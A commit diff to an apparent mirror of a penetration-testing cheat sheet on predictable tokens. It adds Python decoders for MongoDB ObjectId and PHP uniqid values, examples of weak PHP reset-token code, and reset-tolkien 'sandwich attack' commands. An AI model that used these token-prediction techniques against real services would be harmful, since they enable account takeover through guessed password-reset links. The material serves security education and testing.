mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Uniqid + reset-tolkien and sandwich attack
This commit is contained in:
parent
b5251a673f
commit
25c94f809a
@ -4,13 +4,17 @@
|
||||
|
||||
* [GUID / UUID](#guid--uuid)
|
||||
* [GUID Versions](#guid-versions)
|
||||
* [Tools](#tools)
|
||||
* [Mongo ObjectId](#mongo-objectid)
|
||||
* [Tools](#tools)
|
||||
* [Uniqid](#uniqid)
|
||||
* [Other](#other)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## GUID / UUID
|
||||
|
||||
A GUID (Globally Unique Identifier) or UUID (Universally Unique Identifier) is a 128-bit number used to uniquely identify information in computer systems. They are typically represented as a string of hexadecimal digits, divided into five groups separated by hyphens, such as `550e8400-e29b-41d4-a716-446655440000`. GUIDs/UUIDs are designed to be unique across both space and time, reducing the likelihood of duplication even when generated by different systems or at different times.
|
||||
|
||||
|
||||
### GUID Versions
|
||||
|
||||
Version identification: `xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx`
|
||||
@ -25,6 +29,7 @@ The four-bit M and the 1- to 3-bit N fields code the format of the UUID itself.
|
||||
| 4 | randomly generated |
|
||||
| 5 | based on a SHA1 hash |
|
||||
|
||||
|
||||
### Tools
|
||||
|
||||
* [intruder-io/guidtool](https://github.com/intruder-io/guidtool) - A tool to inspect and attack version 1 GUIDs
|
||||
@ -40,6 +45,7 @@ The four-bit M and the 1- to 3-bit N fields code the format of the UUID itself.
|
||||
$ guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
|
||||
```
|
||||
|
||||
|
||||
## Mongo ObjectId
|
||||
|
||||
Mongo ObjectIds are generated in a predictable manner, the 12-byte ObjectId value consists of:
|
||||
@ -48,6 +54,11 @@ Mongo ObjectIds are generated in a predictable manner, the 12-byte ObjectId valu
|
||||
* **Process ID** (2 bytes): Identifies the process that generated the ObjectId. Typically the process ID of the MongoDB server process, making it predictable for documents created by the same process.
|
||||
* **Counter** (3 bytes): A unique counter value that is incremented for each new ObjectId generated. Initialized to a random value when the process starts, but subsequent values are predictable as they are generated in sequence.
|
||||
|
||||
Token example
|
||||
|
||||
* `5ae9b90a2c144b9def01ec37`, `5ae9bac82c144b9def01ec39`
|
||||
|
||||
|
||||
### Tools
|
||||
|
||||
* [andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict) - Predict Mongo ObjectIds
|
||||
@ -57,8 +68,87 @@ Mongo ObjectIds are generated in a predictable manner, the 12-byte ObjectId valu
|
||||
5ae9bacf2c144b9def01ec3a
|
||||
5ae9bada2c144b9def01ec3b
|
||||
```
|
||||
* Python script to recover the `timestamp`, `process` and `counter`
|
||||
```py
|
||||
def MongoDB_ObjectID(timestamp, process, counter):
|
||||
return "%08x%08x%06x" % (
|
||||
timestamp,
|
||||
process,
|
||||
counter,
|
||||
)
|
||||
|
||||
def reverse_MongoDB_ObjectID(token):
|
||||
timestamp = int(token[0:8], 16)
|
||||
process = int(token[8:16], 16)
|
||||
counter = int(token[16:], 16)
|
||||
return timestamp, process, counter
|
||||
|
||||
|
||||
tokens = ["5ae9b90a2c144b9def01ec37", "5ae9bac82c144b9def01ec39"]
|
||||
for token in tokens:
|
||||
(timestamp, process, counter) = reverse_MongoDB_ObjectID(token)
|
||||
print(f"{token}: {timestamp} - {process} - {counter}")
|
||||
```
|
||||
|
||||
|
||||
## Uniqid
|
||||
|
||||
Token derived using `uniqid` are based on timestamp and they can be reversed.
|
||||
|
||||
* [Riamse/python-uniqid](https://github.com/Riamse/python-uniqid/blob/master/uniqid.py) is based on a timestamp
|
||||
* [php/uniqid](https://github.com/php/php-src/blob/master/ext/standard/uniqid.c)
|
||||
|
||||
Token examples
|
||||
|
||||
* uniqid: `6659cea087cd6`, `6659cea087cea`
|
||||
* sha256(uniqid): `4b26d474c77daf9a94d82039f4c9b8e555ad505249437c0987f12c1b80de0bf4`, `ae72a4c4cdf77f39d1b0133394c0cb24c33c61c4505a9fe33ab89315d3f5a1e4`
|
||||
|
||||
|
||||
### Tools
|
||||
|
||||
```py
|
||||
import math
|
||||
import datetime
|
||||
|
||||
def uniqid(timestamp: float) -> str:
|
||||
sec = math.floor(timestamp)
|
||||
usec = round(1000000 * (timestamp - sec))
|
||||
return "%8x%05x" % (sec, usec)
|
||||
|
||||
def reverse_uniqid(value: str) -> float:
|
||||
sec = int(value[:8], 16)
|
||||
usec = int(value[8:], 16)
|
||||
return float(f"{sec}.{usec}")
|
||||
|
||||
tokens = ["6659cea087cd6" , "6659cea087cea"]
|
||||
for token in tokens:
|
||||
t = float(reverse_uniqid(token))
|
||||
d = datetime.datetime.fromtimestamp(t)
|
||||
print(f"{token} - {t} => {d}")
|
||||
```
|
||||
|
||||
|
||||
## Other
|
||||
|
||||
Other bad ideas that are sometimes shipped into production.
|
||||
|
||||
* `$token = md5($emailId).rand(10,9999);`
|
||||
* `$token = md5(time()+123456789 % rand(4000, 55000000));`
|
||||
|
||||
Generic identification and sandwitch attack:
|
||||
|
||||
* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Unsecure time-based secret exploitation and Sandwich attack implementation Resources
|
||||
```ps1
|
||||
reset-tolkien detect 660430516ffcf -d "Wed, 27 Mar 2024 14:42:25 GMT" --prefixes "attacker@example.com" --suffixes "attacker@example.com" --timezone "-7"
|
||||
reset-tolkien sandwich 660430516ffcf -bt 1711550546.485597 -et 1711550546.505134 -o output.txt --token-format="uniqid"
|
||||
```
|
||||
|
||||
|
||||
### References
|
||||
|
||||
* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
|
||||
* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
|
||||
* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
|
||||
* [[FR] Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html)
|
||||
* [[EN] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html)
|
||||
* [Secret non sécurisé basé sur le temps et attaques par sandwich - Tom CHAMBARETAUD aka Aethlios](#)
|
||||
* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - Oct 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
|
Loading…
Reference in New Issue
Block a user